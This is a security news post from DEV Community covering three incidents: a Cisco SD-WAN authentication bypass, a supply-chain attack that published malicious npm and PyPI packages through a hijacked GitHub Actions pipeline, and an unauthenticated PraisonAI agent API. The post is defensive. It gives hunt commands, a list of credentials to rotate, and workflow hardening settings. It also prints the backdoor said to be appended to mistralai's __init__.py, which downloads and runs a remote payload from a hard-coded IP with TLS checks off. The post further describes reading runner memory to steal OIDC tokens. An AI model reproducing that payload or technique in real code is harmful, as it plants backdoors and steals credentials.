DEV Community

Cover image for The Week the Toolchain Became the Kill Chain
Kerry Kier
Kerry Kier Subscriber

Posted on • Originally published at blog.vertexops.org

The Week the Toolchain Became the Kill Chain

Three incidents landed in five days this week. Different attack surfaces, different techniques, different threat actors. What they have in common is that none of them required touching an endpoint. All three went straight for infrastructure that development and operations teams trust implicitly: the network control plane, the software supply chain, and the AI orchestration layer.

Here's what happened and what you need to do about it.


CVE-2026-20182: CVSS 10.0 Auth Bypass in Cisco Catalyst SD-WAN

This one gets a perfect severity score for a reason. The flaw lives in the control connection handshake -- the process by which Cisco Catalyst SD-WAN Controller and Manager (formerly vSmart and vManage) establish trust with peers. An unauthenticated remote attacker sends crafted requests that exploit a validation failure in that handshake and comes out the other side as an authenticated peer with administrative privileges.

No credentials. No prior access. Just broken trust logic in the protocol.

CISA added it to the Known Exploited Vulnerabilities catalog on May 14 and reinforced Emergency Directive 26-03 -- originally issued in February when this campaign first emerged -- giving federal agencies until May 17 to remediate. Three days. That's not a normal patch window, that's an incident response timeline dressed up as a compliance deadline.

What the attacker does after they're in

Cisco Talos attributes active exploitation to UAT-8616, a threat actor that's been specifically targeting SD-WAN infrastructure since at least 2023. Their post-compromise playbook, observed across multiple intrusions:

  • SSH key injection into the vmanage-admin authorized_keys file
  • NETCONF command execution to manipulate configurations across the entire SD-WAN fabric
  • Malicious account creation
  • Software version downgrade to expose CVE-2022-20775 for root escalation
  • Extensive log clearing to remove evidence

Their infrastructure overlaps with Operational Relay Box networks, which is how the activity stays hard to attribute and trace.

What to check right now

CISA's hunt guidance for ED 26-03 includes these specific log checks. If you run Cisco Catalyst SD-WAN, run these before anything else:

# Check auth.log for unexpected vmanage-admin SSH key authentications
grep "Accepted publickey for vmanage-admin" /var/log/auth.log

# Check for control connections with challenge-ack of 0 (may indicate unauthorized peer)
show control connections detail
show control connections-history detail
# Look for: state:up AND challenge-ack: 0
Enter fullscreen mode Exit fullscreen mode

CISA has confirmed CVE-2026-20127, CVE-2026-20133, and CVE-2026-20182 in the KEV catalog with additional CVEs referenced in the directive guidance. Patches are available for all supported releases. If you can't patch immediately, restrict management interface access to trusted IPs and take the controller off public internet exposure.


Mini Shai-Hulud: When GitHub Actions Publishes Malware for You

This is the supply chain story of the year so far, and the technique is worth understanding in detail because it defeated controls that were specifically designed to prevent this.

On May 11, threat actor TeamPCP compromised 172 packages across 403 malicious versions on npm and PyPI in a 48-hour window. Targets included the entire @tanstack namespace, Mistral AI's official SDKs, UiPath automation tooling, OpenSearch, and Guardrails AI -- figures reported across multiple security researchers and advisories. @tanstack/react-router alone had over 12 million weekly downloads at the time of the attack.

But the number of packages isn't the interesting part. The attack chain is.

The three-vulnerability chain

TeamPCP didn't steal npm credentials. They hijacked TanStack's own release pipeline and published through its legitimate identity. The chain:

Step 1 -- Pwn Request via pull_request_target misconfiguration

The attacker forked TanStack/router, renamed the fork to zblgg/configuration to avoid appearing in fork-list searches, and opened a pull request. The pull_request_target trigger in GitHub Actions runs workflows with write permissions even against code from external forks. This let the attacker's fork code execute in a privileged context.

Step 2 -- GitHub Actions cache poisoning

The attacker's code poisoned the pnpm store cache with a 1.1 GB malicious entry keyed to match the hash that TanStack's legitimate release workflow would look up. actions/cache@v5 uses a runner-internal token for cache saves, not the workflow's GITHUB_TOKEN -- so setting permissions: contents: read doesn't prevent cache mutation from a fork-triggered workflow.

Step 3 -- OIDC token extraction from runner memory

When TanStack's legitimate release.yml workflow ran, it restored the poisoned cache. The injected code then read the GitHub Actions runner's process memory via /proc/<pid>/mem, scanning for {"value":"...","isSecret":true} patterns to extract the ambient OIDC token. That token was used to publish 84 malicious npm package versions in two batches at 19:20 and 19:26 UTC.

The published packages carried valid SLSA provenance -- cryptographic attestation from Sigstore confirming the package was built from a trusted pipeline. The attestation was accurate. The pipeline was compromised. The trust signal worked exactly as designed and still failed to catch it.

The PyPI side

The mistralai 2.4.6 and guardrails-ai 0.10.1 payloads used a different mechanism: a backdoor appended to __init__.py that fires on import, not install:

# Payload appended to __init__.py in mistralai 2.4.6
import subprocess as _sub, os as _os, sys as _sys
_url = "https://83.142.209.194/transformers.pyz"
_dest = "/tmp/transformers.pyz"
_sub.run(["curl", "-k", "-L", "-s", _url, "-o", _dest], timeout=15)
_sub.Popen([_sys.executable, _dest])
Enter fullscreen mode Exit fullscreen mode

Note the -k flag -- TLS verification disabled. The payload only executes on Linux and exits if it detects Russian language settings or fewer than four CPUs. PyPI quarantined the entire mistralai project. Any environment that ran import mistralai during the attack window should be treated as compromised regardless of whether the install itself ran in a sandbox.

The malware targets: GitHub Actions OIDC tokens, GitLab and CircleCI tokens, AWS IMDSv2 credentials, GCP and Azure credentials, Kubernetes service account tokens, HashiCorp Vault tokens, npm and PyPI publish tokens, and -- new in this wave -- 1Password and Bitwarden password vault contents. Exfiltration channels include a typosquat domain (git-tanstack[.]com), the Session encrypted messenger network, and GitHub repositories created using stolen tokens.

What to do if you ran affected packages on May 11-12

Rotate all of the following from any environment where a compromised package ran:

  • npm tokens
  • GitHub personal access tokens and Actions secrets
  • AWS, GCP, and Azure credentials
  • Kubernetes service account tokens
  • HashiCorp Vault tokens
  • Deployment secrets and SSH keys
  • npm and PyPI publish tokens

Don't stop at npm tokens. Check for these persistence indicators:

# Check for worm persistence files
find ~ -path '*/.claude/setup.mjs' -o -path '*/.vscode/setup.mjs'
find ~/.config -name '*gh-token-monitor*'
find ~/.local/bin -name 'gh-token-monitor.sh'
find /tmp -name 'tmp.ts018051808.lock'

# Check for running worm processes
ps aux | grep -E 'tanstack_runner|router_runtime|gh-token-monitor|bun'

# Check for PyPI payload on Linux
find /tmp -name 'transformers.pyz'
Enter fullscreen mode Exit fullscreen mode

Block at DNS/proxy level: git-tanstack.com and *.getsession.org.

Hardening GitHub Actions against this class of attack

The three vulnerabilities chained here are all documented and preventable:

# Don't use pull_request_target for workflows that need write permissions
# unless you explicitly gate on trusted authors
on:
  pull_request:  # use pull_request, not pull_request_target, for untrusted code
    types: [opened, synchronize]

# Scope permissions explicitly
permissions:
  contents: read
  id-token: write  # only if OIDC publishing is required

# Pin actions to commit SHAs, not tags
- uses: actions/cache@1bd1e32a3bdc45362d1e726936510720a7c6158d  # v4.2.2
Enter fullscreen mode Exit fullscreen mode

The cache poisoning vector is harder to fully close because actions/cache uses a runner-internal token for saves. Restrict which workflows can write to cache, and consider using a separate isolated runner for release workflows that have OIDC publish permissions.


CVE-2026-44338: Your AI Agent Is Listening and It Will Do What You Ask

PraisonAI is a multi-agent orchestration framework for building autonomous AI agents. Roughly 7,000 GitHub stars at the time of disclosure. Not a major enterprise platform -- exactly the kind of tool that gets adopted fast by teams automating workflows, often before anyone has reviewed its security defaults.

The vulnerability is embarrassingly simple. The legacy Flask API server ships with this configuration:

# src/praisonai/api_server.py
AUTH_ENABLED = False
AUTH_TOKEN = None

def check_auth():
    if not AUTH_ENABLED:
        return True  # Always passes when auth is disabled
    # ... actual auth check never reached
Enter fullscreen mode Exit fullscreen mode

Two endpoints fail completely open as a result:

GET /agents
# Returns all configured agent metadata including agent file name and agent list
# No auth required

POST /chat
# Body: {"message": "anything"}
# Executes agents.yaml workflow regardless of message content
# No auth required
Enter fullscreen mode Exit fullscreen mode

The POST /chat endpoint ignores the message value entirely. It calls PraisonAI(agent_file="agents.yaml").run() directly. Whatever your workflow is configured to do -- LLM API calls, shell execution, file I/O, external integrations -- any unauthenticated caller can trigger it. The server also binds to 0.0.0.0:8080 by default, so if it's reachable from the network it's fully exposed.

The exploitation timeline

  • 13:56 UTC May 11: GitHub advisory GHSA-6rmh-7xcm-cpxj published for CVE-2026-44338
  • 17:40 UTC May 11: Sysdig observes first active probe of the specific vulnerable endpoint

Three hours and 44 minutes. The scanner identified itself as CVE-Detector/1.0 and targeted the exact /agents endpoint with no Authorization header. It received HTTP 200 with the agent configuration. That's a confirmed successful exploit against a live exposed instance within four hours of the advisory going public.

This isnt a large project. The adversary tooling scanning for AI agent surfaces doesnt care about project size or star count. Any internet-exposed agentic framework is in scope.

Fix

Update to PraisonAI 4.6.34 or later, which removes the legacy API server behavior. If you can't patch immediately:

  • Restrict network access to the API server using a firewall -- do not leave it internet-exposed
  • Switch to the newer serve agent command which binds to localhost and supports API key authentication
  • Audit your agents.yaml: understand what an unauthenticated trigger of your workflow would actually do in your environment

The broader lesson: any AI agent deployment you have running that binds to 0.0.0.0, has authentication disabled or unverified, or hasn't been assessed for what an unauthenticated workflow trigger does in production -- that's exposure. The window between disclosure and active scanning is now hours, and adversary tooling has been specifically instrumented for the AI agent attack surface.


The Common Thread

None of these required a compromised endpoint or a phishing email. UAT-8616 went straight to the SD-WAN controller. TeamPCP bypassed developers entirely and published through their own pipeline. The PraisonAI scanner triggered the agent workflow without needing to understand what it did.

The attack surface has shifted. Network control planes, CI/CD pipelines, and AI orchestration layers are not governed with the same rigor as production application environments -- and the people exploiting them have clearly noticed. If your threat model doesn't include the toolchain itself, this week is a reasonable argument for updating it.

Full analysis with additional context at the canonical version: https://blog.vertexops.org/the-week-the-toolchain-became-the-kill-chain

Top comments (0)